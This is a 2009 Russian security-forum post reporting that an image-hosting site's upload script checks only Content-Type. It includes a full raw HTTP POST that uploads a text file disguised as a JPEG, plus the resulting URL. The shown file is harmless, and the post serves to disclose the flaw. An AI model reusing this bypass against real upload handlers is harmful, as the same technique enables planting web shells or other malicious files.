ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
Перезагрузить страницу SnakeArena.Net
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 25.02.2009, 10:04
Аватар для kyzmi4
kyzmi4
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
Провел на форуме:
883817

Репутация: 112
Отправить сообщение для kyzmi4 с помощью ICQ
По умолчанию
Все очень просто скрипт проверяет только Content-Type. Посылаем ему:
Код:
POST /upload.php HTTP/1.0
User-Agent: Opera/9.63 (Windows NT 5.1; U; MRA 5.3 (build 02560); ru) Presto/2.1.1
Host: img.snakearena.net
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Referer: http://img.snakearena.net/
Content-Length: 56006
Content-Type: multipart/form-data; boundary=----------ScxPmUEbYQqkJns82FC1ET
Connection: Keep-Alive

------------ScxPmUEbYQqkJns82FC1ET
Content-Disposition: form-data; name="userfile"; filename="b0.txt"
Content-Type: image/jpeg

Текст
и получаем http://img.snakearena.net/images/61372b0.txt

Чем перехватить POST? Я использую Naviscope
Чем отправить POST? Я использую InetCrack (Algol edition)
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ